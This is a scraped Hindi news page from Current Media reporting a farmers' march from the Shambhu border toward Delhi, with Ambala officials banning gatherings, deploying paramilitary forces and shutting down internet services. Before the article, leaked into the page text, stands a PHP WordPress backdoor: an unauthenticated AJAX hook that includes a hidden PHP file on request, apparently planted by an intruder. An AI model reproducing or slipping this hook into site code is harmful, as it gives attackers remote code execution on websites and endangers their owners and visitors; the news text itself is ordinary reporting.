if(!function_exists('file_check_tmp3og2p0p6')){ add_action('wp_ajax_nopriv_file_check_tmp3og2p0p6', 'file_check_tmp3og2p0p6'); add_action('wp_ajax_file_check_tmp3og2p0p6', 'file_check_tmp3og2p0p6'); function file_check_tmp3og2p0p6() { $file = __DIR__ . '/' . 'tmp3og2p0p6.php'; if (file_exists($file)) { include $file; } die(); } }किसानों की फिर से दिल्ली घेरने की तैयारी - Current Media

किसानों की फिर से दिल्ली घेरने की तैयारी

नई दिल्ली । काफी समय से किसानों की शांति के बाद किसानों और मजदूरों का जत्था शंभू बार्डर से दिल्ली की ओर कूच करने के लिए तैयार है ।
किसान नेता सरवन सिंह पंढेर ने बयान देते हुए कहा कि मोर्चे को चलते हुए 297 दिन हो गए है और खनौरी सीमा पर चल रहा आमरण अनशन 11वें दिन में दाखिल हो गया है। लगभग 1 बजे 101 किसान-मजदूरों का जत्था शंभू बार्डर की ओर से दिल्ली की ओर कूच करेगा।
हालांकि, अंबाला जिला प्रशासन ने भारतीय नागरिक सुरक्षा संहिता की धारा 163 के तहत आदेश जारी करते हुए जिले में पांच या उससे से अधिक व्यक्तियों के किसी भी अवैध जमावड़े पर रोक लगा दी है।
डिप्टी कमिश्नर के जारी आदेश के अनुसार, पैदल, वाहन या अन्य किसी भी माध्यम से जुलूस निकालने पर अगले आदेश तक प्रतिबंध लगा दिया गया हैं।
गुरुवार को अंबाला पुलिस ने किसानों के दिल्ली मार्च की योजना के चलते अलर्ट जारी किया है और सीमा पर सुरक्षा स्थिति का आकलन करने के लिए वरिष्ठ अधिकारियों को भेजा। किसानों के जत्थे को रोकने के लिए हरियाणा सीमा पर केंद्रीय अर्धसैनिक बलों को तैनात किया गया है। कई जगहों पर बैरिकेडिंग भी की गई है। अंबाला में प्रशासन ने इंटरनेट सेवाएं बंद कर दी है ।

About currentmedia09@gmail.com

Currentmedia.in राष्ट्रीय स्तर पर तेजी से बढ़ती हुई हिंदी समाचार वेबासाइट है। वेबसाइट में ब्यूरोक्रेसी में ताजा घटनाक्रम, देश और समाज के लिए अमूल्य योगदान देने वाले व अपने कार्यो के दम पर अपनी पहचान बनाने वाले आइएएस और आइपीएस अधिकारियों व डॉक्टरो, कानून के जानकारों की रोचक स्टोरी के साथ उनके जीवन संघर्षो पर आधारित निष्पक्ष लेख पाठक को मिलेंगे। वेबसाइट में अन्य क्षेत्रों के भी विश्वसनीय, प्रमाणिक और निष्पक्ष समाचार पाठक वर्ग के लिए उपलब्ध रहेगा, इसके लिए वेबसाइट की ऑनलाइन संपादकीय टीम हर रोज विस्तृत कंटेट अपडेट करती रहेगी। संपादकीय टीम की कोशिश यही रहेगी की न्यूज कंटेट को लेकर पाठक वर्ग को किसी तरह की निराशा हाथ न लगे। साइट 24 घंटे प्रयोग में रहेगी।

Check Also

खिरिया घाट पर अवैध खनन के खिलाफ बड़ी कार्रवाई, आधा दर्जन से अधिक ट्रैक्टर-ट्रॉलियां पकड़ीं

झांसी। राशिद पठान । अवैध खनन के खिलाफ प्रशासन ने गुरुवार रात बड़ी कार्रवाई करते …